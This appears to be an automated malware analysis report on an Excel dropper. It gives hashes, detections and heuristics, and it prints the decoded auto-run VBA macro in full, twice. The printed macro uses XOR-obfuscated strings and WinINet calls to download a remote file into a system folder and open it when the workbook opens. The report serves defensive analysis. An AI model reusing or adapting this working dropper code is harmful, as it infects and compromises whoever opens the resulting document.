Xls.Dropper.Agent-1616819 Office (OLE) malware analysis — malicious · 0ecabe0a7fceb2df

MALICIOUS

Office (OLE)

60.0 KB Created: 2015-03-18 18:45:18 Authoring application: Microsoft Excel First seen: 2015-04-05

MD5: 8a12c1d3fb8111eb13ba10ba03373326 SHA-1: c7fcce3f2e11afd522f02991b3025de36bed0e4c SHA-256: 0ecabe0a7fceb2dfdce96295d0ecceca0d8e0546c976a913f0e10c819af70fc0

170 Risk Score

Malware Insights

Xls.Dropper.Agent-1616819 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV and contains VBA macros, specifically a Workbook_Open macro that executes a CreateObject call. This indicates the macro is designed to run automatically upon opening the Excel file, likely to download and execute a secondary payload from the embedded URL. The presence of WinINet API declarations suggests network activity for payload retrieval.

Heuristics 6

ClamAV: Xls.Dropper.Agent-1616819 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.Agent-1616819
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set lodppo21 = CreateObject _
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL https://github.com/vbaidiot/Ariawase In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10280 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10280 bytes
SHA-256: `353b885f1215c3aa5d42257fd9b53bd422a6a7d6945c8c23818000965c9232ee`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisBook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Sub Workbook_Open() Phamt72loaj End Sub Attribute VB_Name = "Page1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Page2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Page3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Heroro6" Option Explicit #If VBA7 And Win64 Then Public Declare PtrSafe Function HUDZOAKJJ Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long Public Declare PtrSafe Function AJJJAKKL3 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr Public Declare PtrSafe Function BVBAJAIE1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal HOHOFI1 As LongPtr, ByVal HAHABU4 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer Public Declare PtrSafe Function ALKJPEQQ1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr #Else Public Declare Function HUDZOAKJJ Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long Public Declare Function AJJJAKKL3 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long Public Declare Function BVBAJAIE1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal HOHOFI1 As Long, ByVal HAHABU4 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer Public Declare Function ALKJPEQQ1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long #End If Attribute VB_Name = "File55" '''+---- --+ '''\| Ariawase 0.6.0 \| '''\| Ariawase is free library for VBA cowboys. \| '''\| The Project Page: https://github.com/vbaidiot/Ariawase \| '''+-- ----+ Option Explicit Option Private Module Attribute VB_Name = "File643" Public Enum CdoProtocolsAuthentication cdoAnonymous = 0 cdoBasic = 1 cdoNTLM = 2 End Enum Public Const cdo7bit As String = "7bit" Public Const cdo8bit As String = "8bit" Public Const cdoISO_2022_JP As String = "iso-2022-jp" Public Const cdoShift_JIS As String = "shift-jis" Public Const cdoEUC_JP As String = "euc-jp" Public Const cdoUTF_8 As String = "utf-8" Public Const cdoBase64 As String = "base64" Public Const cdoQuotedPrintable As String = "quoted-printable" Sub Phamt72loaj() Dim KLAKKKSMMCV As Integer For KLAKKKSMMCV = 0 To 0 If KLAKKKSMMCV = 22 Then End Next KLAKKKSMMCV KokoRuko End Sub Attribute VB_Name = "Loop4" Option Explicit Private Const MBL = 8162 Private Const AAN As String = "PRO1" Private Const IOTD = 1 Private Const IFNCW = &H4000000 Public Function TOPONO6(ByVal LINKO As String, ByVal FILO1 As String) As Boolean #If VBA7 And Win64 Then Dim HOHOFO2 As LongPtr, HOHOFI1 As LongPtr #Else Dim HOHOFO2 As Long, HOHOFI1 As Long #End If Dim HIHORE2 As Long Dim HAHABU4 As String * MBL, HUHUHISD6 As String Dim HEHEIFI5 As Integer, KLOPA8 As Double HOHOFO2 = AJJJAKKL3(AAN, IOTD, vbNullString, vbNullString, 0) If HOHOFO2 = 0 Then Exit Function End If HOHOFI1 = ALKJPEQQ1(HOHOFO2, LINKO, vbNullString, 0, IFNCW, 0) If HOHOFI1 = 0 Then KLOPA8 = 0 Else BVBAJAIE1 HOHOFI1, HAHABU4, MBL, HIHORE2 HUHUHISD6 = HAHABU4 Do While HIHORE2 <> 0 BVBAJAIE1 HOHOFI1, HAHABU4, MBL, HIHORE2 HUHUHISD6 = HUHUHISD6 + Mid(HAHABU4, 1, HIHORE2) Loop KLOPA8 = Len(HUHUHISD6): HEHEIFI5 = FreeFile Open FILO1 For Binary Access Write Lock Write As #HEHEIFI5 Put #HEHEIFI5, , HUHUHISD6: Close #HEHEIFI5 End If HUDZOAKJJ HOHOFI1 HUDZOAKJJ HOHOFO2 HUHUHISD6 = "" If KLOPA8 Then TOPONO6 = True End If End Function Attribute VB_Name = "Corob5" Private Sub cdsf56GG() GoTo cssghjtky7 cssghjtky7: GoTo louioui89 louioui89: GoTo mgsmshm mgsmshm: GoTo ntyntyty ntyntyty: GoTo nyttdndny nyttdndny: GoTo brtjtjty brtjtjty: End Sub Public Function MANAHD3(parampam1 As String, tarampam1 As String) As String Dim ziZItoTO1 As Long Dim loLOpoPO1 As String Dim keKEpePE1 As Integer Dim DKKALLLAKK As Integer For DKKALLLAKK = 0 To 0 If DKKALLLAKK = 25 Then End Next DKKALLLAKK Dim keKEpePE11 As Integer For ziZItoTO1 = 1 To (Len(tarampam1) / 2) keKEpePE1 = val("&H" & (Mid$(tarampam1, (2 * ziZItoTO1) - 1, 2))) keKEpePE11 = Asc(Mid$(parampam1, ((ziZItoTO1 Mod Len(parampam1)) + 1), 1)) Dim LOAJNNCDHJ As Integer For LOAJNNCDHJ = 0 To 0 If LOAJNNCDHJ = 14 Then End Next LOAJNNCDHJ loLOpoPO1 = loLOpoPO1 + Chr(keKEpePE1 Xor keKEpePE11) Dim PAPPAPPPAPP As Integer For PAPPAPPPAPP = 0 To 0 If PAPPAPPPAPP = 4 Then End Next PAPPAPPPAPP Next ziZItoTO1 MANAHD3 = loLOpoPO1 End Function Private Sub IHYbeffeVuJC() GoTo asefbttttawf3 asefbttttawf3: GoTo sgr4bsgbf67gfh sgr4bsgbf67gfh: GoTo sdvxcxb sdvxcxb: GoTo SSSDFBSS SSSDFBSS: GoTo UTYRURU UTYRURU: GoTo KKTKTJT KKTKTJT: GoTo IhzKeee2ascfacas2zw IhzKeee2ascfacas2zw: End Sub Attribute VB_Name = "Class1" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private xInit As Boolean Private xItems As Variant Private xLength As Long Public Property Get Item1() As Variant Dim i As Long: i = 0 If IsObject(xItems(i)) Then Set Item1 = xItems(i) Else Let Item1 = xItems(i) End Property Public Property Get Item2() As Variant Dim i As Long: i = 1 If IsObject(xItems(i)) Then Set Item2 = xItems(i) Else Let Item2 = xItems(i) End Property Public Property Get Item3() As Variant Dim i As Long: i = 2 If xLength <= i Then Err.Raise 380 If IsObject(xItems(i)) Then Set Item3 = xItems(i) Else Let Item3 = xItems(i) End Property Public Property Get Item4() As Variant Dim i As Long: i = 3 If xLength <= i Then Err.Raise 380 If IsObject(xItems(i)) Then Set Item4 = xItems(i) Else Let Item4 = xItems(i) End Property Public Sub Init(ParamArray itms() As Variant) If xInit Then Err.Raise 5 xItems = itms xLength = UBound(itms) + 1 If xLength < 2 Then Err.Raise 5 xInit = True End Sub Public Function ToArray() As Variant ToArray = xItems End Function Attribute VB_Name = "Module1" Private Const vEVeE3286 = "261110051947723D3D3D1C1A141D1C065D" Private Const rabannsd4 = 30 Private Const ceceexcxxXXd = "29091C1B1C1D0B7B63340D1C" Private Const rabannsd2 = 31 Private Const ceecqq902 = "1D0D01194F461C3A3A265B1510071D08463E283F5B1D10461F1A1C2F243F5B1C0D0C" Private Const rabannsd1 = 33 Private Const cemMmm381 = "261A0700051D5A232A7F3310190C26104039283C3A1B1F0C161D" Private Const rabannsd0 = 34 Private Const ceew343vgVV = "Quyuiui3MM" Sub KokoRuko() Dim lodppo21 Set lodppo21 = CreateObject _ (MANAHD3(ceew343vgVV, cemMmm381)) Dim UPANDNNN2 Const conspol3 = 2 Dim DLAPPAKKVD3 As Integer For DLAPPAKKVD3 = 0 To 0 If DLAPPAKKVD3 = 4 Then End Next DLAPPAKKVD3 Set UPANDNNN2 = lodppo21.GetSpecialFolder(conspol3) Dim LPPAOOOAOAOMXNXNN As Integer For LPPAOOOAOAOMXNXNN = 0 To 0 If LPPAOOOAOAOMXNXNN = 5 Then End Next LPPAOOOAOAOMXNXNN BIGABBDH1 = UPANDNNN2 & MANAHD3(ceew343vgVV, ceceexcxxXXd) Dim PAOOKDKDKDAJWHNN21 As Integer For PAOOKDKDKDAJWHNN21 = 0 To 0 If PAOOKDKDKDAJWHNN21 = 5 Then End Next PAOOKDKDKDAJWHNN21 Set dwwwdFO2 = CreateObject _ (MANAHD3(ceew343vgVV, cemMmm381)) Dim ASS555ASS As Integer For ASS555ASS = 0 To 0 If ASS555ASS = 5 Then End Next ASS555ASS If dwwwdFO2.FileExists(BIGABBDH1) Then dwwwdFO2.DeleteFile BIGABBDH1 End If Dim APOHRKJBMXIKSHJ As Integer For APOHRKJBMXIKSHJ = 0 To 0 If APOHRKJBMXIKSHJ = 15 Then End Next APOHRKJBMXIKSHJ If TOPONO6(MANAHD3(ceew343vgVV, ceecqq902), BIGABBDH1) Then End If Set SSSS = Nothing Dim ALOOEPPPEPP2 As Integer For ALOOEPPPEPP2 = 0 To 0 If ALOOEPPPEPP2 = 8 Then End Next ALOOEPPPEPP2 If dwwwdFO2.FileExists(BIGABBDH1) Then End If Dim PLKJHAGGGTTTS As Integer For PLKJHAGGGTTTS = 0 To 0 If PLKJHAGGGTTTS = 3 Then End Next PLKJHAGGGTTTS Set SASASA = CreateObject _ (MANAHD3(ceew343vgVV, vEVeE3286)) Dim APQIEJAQPLQ As Integer For APQIEJAQPLQ = 0 To 0 If APQIEJAQPLQ = 5 Then End Next APQIEJAQPLQ SASASA.Open BIGABBDH1 End Sub

SHA-256: 353b885f1215c3aa5d42257fd9b53bd422a6a7d6945c8c23818000965c9232ee

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisBook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
Phamt72loaj
End Sub


Attribute VB_Name = "Page1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Page2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Page3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Heroro6"
Option Explicit

#If VBA7 And Win64 Then
Public Declare PtrSafe Function HUDZOAKJJ Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
Public Declare PtrSafe Function AJJJAKKL3 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
Public Declare PtrSafe Function BVBAJAIE1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal HOHOFI1 As LongPtr, ByVal HAHABU4 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Public Declare PtrSafe Function ALKJPEQQ1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
#Else
Public Declare Function HUDZOAKJJ Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
Public Declare Function AJJJAKKL3 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
Public Declare Function BVBAJAIE1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal HOHOFI1 As Long, ByVal HAHABU4 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Public Declare Function ALKJPEQQ1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
#End If

Attribute VB_Name = "File55"

'''+----                                                                   --+
'''|                             Ariawase 0.6.0                              |
'''|                Ariawase is free library for VBA cowboys.                |
'''|          The Project Page: https://github.com/vbaidiot/Ariawase         |
'''+--                                                                   ----+
Option Explicit
Option Private Module




Attribute VB_Name = "File643"




Public Enum CdoProtocolsAuthentication
    cdoAnonymous = 0
    cdoBasic = 1
    cdoNTLM = 2
End Enum

Public Const cdo7bit        As String = "7bit"
Public Const cdo8bit        As String = "8bit"
Public Const cdoISO_2022_JP As String = "iso-2022-jp"
Public Const cdoShift_JIS   As String = "shift-jis"
Public Const cdoEUC_JP      As String = "euc-jp"
Public Const cdoUTF_8       As String = "utf-8"

Public Const cdoBase64          As String = "base64"
Public Const cdoQuotedPrintable As String = "quoted-printable"
Sub Phamt72loaj()

Dim KLAKKKSMMCV As Integer
For KLAKKKSMMCV = 0 To 0
If KLAKKKSMMCV = 22 Then End
Next KLAKKKSMMCV
KokoRuko

End Sub








Attribute VB_Name = "Loop4"
Option Explicit


Private Const MBL = 8162
Private Const AAN As String = "PRO1"
Private Const IOTD = 1
Private Const IFNCW = &H4000000
Public Function TOPONO6(ByVal LINKO As String, ByVal FILO1 As String) As Boolean
    #If VBA7 And Win64 Then
        Dim HOHOFO2 As LongPtr, HOHOFI1 As LongPtr
    #Else
        Dim HOHOFO2 As Long, HOHOFI1 As Long
    #End If
    Dim HIHORE2 As Long
    Dim HAHABU4 As String * MBL, HUHUHISD6 As String
    Dim HEHEIFI5 As Integer, KLOPA8 As Double
    HOHOFO2 = AJJJAKKL3(AAN, IOTD, vbNullString, vbNullString, 0)
    If HOHOFO2 = 0 Then
        Exit Function
    End If
    HOHOFI1 = ALKJPEQQ1(HOHOFO2, LINKO, vbNullString, 0, IFNCW, 0)
    If HOHOFI1 = 0 Then
        KLOPA8 = 0
    Else
        BVBAJAIE1 HOHOFI1, HAHABU4, MBL, HIHORE2
        HUHUHISD6 = HAHABU4
        Do While HIHORE2 <> 0
            BVBAJAIE1 HOHOFI1, HAHABU4, MBL, HIHORE2
            HUHUHISD6 = HUHUHISD6 + Mid(HAHABU4, 1, HIHORE2)
        Loop
        KLOPA8 = Len(HUHUHISD6): HEHEIFI5 = FreeFile
        Open FILO1 For Binary Access Write Lock Write As #HEHEIFI5
        Put #HEHEIFI5, , HUHUHISD6: Close #HEHEIFI5
    End If
    HUDZOAKJJ HOHOFI1
    HUDZOAKJJ HOHOFO2
    HUHUHISD6 = ""
    If KLOPA8 Then
        TOPONO6 = True
    End If
End Function


Attribute VB_Name = "Corob5"
Private Sub cdsf56GG()
GoTo cssghjtky7
cssghjtky7:
GoTo louioui89
louioui89:
GoTo mgsmshm
mgsmshm:
GoTo ntyntyty
ntyntyty:
GoTo nyttdndny
nyttdndny:
GoTo brtjtjty
brtjtjty:

End Sub
Public Function MANAHD3(parampam1 As String, tarampam1 As String) As String
    Dim ziZItoTO1 As Long
    Dim loLOpoPO1 As String
    Dim keKEpePE1 As Integer
    
    Dim DKKALLLAKK As Integer
For DKKALLLAKK = 0 To 0
If DKKALLLAKK = 25 Then End
Next DKKALLLAKK
    
    Dim keKEpePE11 As Integer

    For ziZItoTO1 = 1 To (Len(tarampam1) / 2)
        keKEpePE1 = val("&H" & (Mid$(tarampam1, (2 * ziZItoTO1) - 1, 2)))
        keKEpePE11 = Asc(Mid$(parampam1, ((ziZItoTO1 Mod Len(parampam1)) + 1), 1))
        Dim LOAJNNCDHJ As Integer
        For LOAJNNCDHJ = 0 To 0
        If LOAJNNCDHJ = 14 Then End
        Next LOAJNNCDHJ
        loLOpoPO1 = loLOpoPO1 + Chr(keKEpePE1 Xor keKEpePE11)
         Dim PAPPAPPPAPP As Integer
        For PAPPAPPPAPP = 0 To 0
        If PAPPAPPPAPP = 4 Then End
        Next PAPPAPPPAPP
    Next ziZItoTO1
   MANAHD3 = loLOpoPO1
End Function

Private Sub IHYbeffeVuJC()
GoTo asefbttttawf3
asefbttttawf3:
GoTo sgr4bsgbf67gfh
sgr4bsgbf67gfh:
GoTo sdvxcxb
sdvxcxb:
GoTo SSSDFBSS
SSSDFBSS:
GoTo UTYRURU
UTYRURU:
GoTo KKTKTJT
KKTKTJT:
GoTo IhzKeee2ascfacas2zw
IhzKeee2ascfacas2zw:

End Sub


Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private xInit As Boolean
Private xItems As Variant
Private xLength As Long

Public Property Get Item1() As Variant
    Dim i As Long: i = 0
    If IsObject(xItems(i)) Then Set Item1 = xItems(i) Else Let Item1 = xItems(i)
End Property

Public Property Get Item2() As Variant
    Dim i As Long: i = 1
    If IsObject(xItems(i)) Then Set Item2 = xItems(i) Else Let Item2 = xItems(i)
End Property

Public Property Get Item3() As Variant
    Dim i As Long: i = 2
    If xLength <= i Then Err.Raise 380
    If IsObject(xItems(i)) Then Set Item3 = xItems(i) Else Let Item3 = xItems(i)
End Property

Public Property Get Item4() As Variant
    Dim i As Long: i = 3
    If xLength <= i Then Err.Raise 380
    If IsObject(xItems(i)) Then Set Item4 = xItems(i) Else Let Item4 = xItems(i)
End Property

Public Sub Init(ParamArray itms() As Variant)
    If xInit Then Err.Raise 5
    xItems = itms
    xLength = UBound(itms) + 1
    
    If xLength < 2 Then Err.Raise 5
    xInit = True
End Sub

Public Function ToArray() As Variant
    ToArray = xItems
End Function

Attribute VB_Name = "Module1"
Private Const vEVeE3286 = "261110051947723D3D3D1C1A141D1C065D"
Private Const rabannsd4 = 30
Private Const ceceexcxxXXd = "29091C1B1C1D0B7B63340D1C"
Private Const rabannsd2 = 31
Private Const ceecqq902 = "1D0D01194F461C3A3A265B1510071D08463E283F5B1D10461F1A1C2F243F5B1C0D0C"
Private Const rabannsd1 = 33
Private Const cemMmm381 = "261A0700051D5A232A7F3310190C26104039283C3A1B1F0C161D"
Private Const rabannsd0 = 34

Private Const ceew343vgVV = "Quyuiui3MM"
Sub KokoRuko()


Dim lodppo21
Set lodppo21 = CreateObject _
(MANAHD3(ceew343vgVV, cemMmm381))
Dim UPANDNNN2
Const conspol3 = 2
Dim DLAPPAKKVD3 As Integer
For DLAPPAKKVD3 = 0 To 0
If DLAPPAKKVD3 = 4 Then End
Next DLAPPAKKVD3
Set UPANDNNN2 = lodppo21.GetSpecialFolder(conspol3)
Dim LPPAOOOAOAOMXNXNN As Integer
For LPPAOOOAOAOMXNXNN = 0 To 0
If LPPAOOOAOAOMXNXNN = 5 Then End
Next LPPAOOOAOAOMXNXNN
BIGABBDH1 = UPANDNNN2 & MANAHD3(ceew343vgVV, ceceexcxxXXd)
Dim PAOOKDKDKDAJWHNN21 As Integer
For PAOOKDKDKDAJWHNN21 = 0 To 0
If PAOOKDKDKDAJWHNN21 = 5 Then End
Next PAOOKDKDKDAJWHNN21
Set dwwwdFO2 = CreateObject _
(MANAHD3(ceew343vgVV, cemMmm381))
Dim ASS555ASS As Integer
For ASS555ASS = 0 To 0
If ASS555ASS = 5 Then End
Next ASS555ASS
If dwwwdFO2.FileExists(BIGABBDH1) Then
dwwwdFO2.DeleteFile BIGABBDH1
End If
Dim APOHRKJBMXIKSHJ As Integer
For APOHRKJBMXIKSHJ = 0 To 0
If APOHRKJBMXIKSHJ = 15 Then End
Next APOHRKJBMXIKSHJ
If TOPONO6(MANAHD3(ceew343vgVV, ceecqq902), BIGABBDH1) Then
End If
Set SSSS = Nothing
Dim ALOOEPPPEPP2 As Integer
For ALOOEPPPEPP2 = 0 To 0
If ALOOEPPPEPP2 = 8 Then End
Next ALOOEPPPEPP2
If dwwwdFO2.FileExists(BIGABBDH1) Then
End If
Dim PLKJHAGGGTTTS As Integer
For PLKJHAGGGTTTS = 0 To 0
If PLKJHAGGGTTTS = 3 Then End
Next PLKJHAGGGTTTS
Set SASASA = CreateObject _
(MANAHD3(ceew343vgVV, vEVeE3286))
Dim APQIEJAQPLQ As Integer
For APQIEJAQPLQ = 0 To 0
If APQIEJAQPLQ = 5 Then End
Next APQIEJAQPLQ
SASASA.Open BIGABBDH1

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.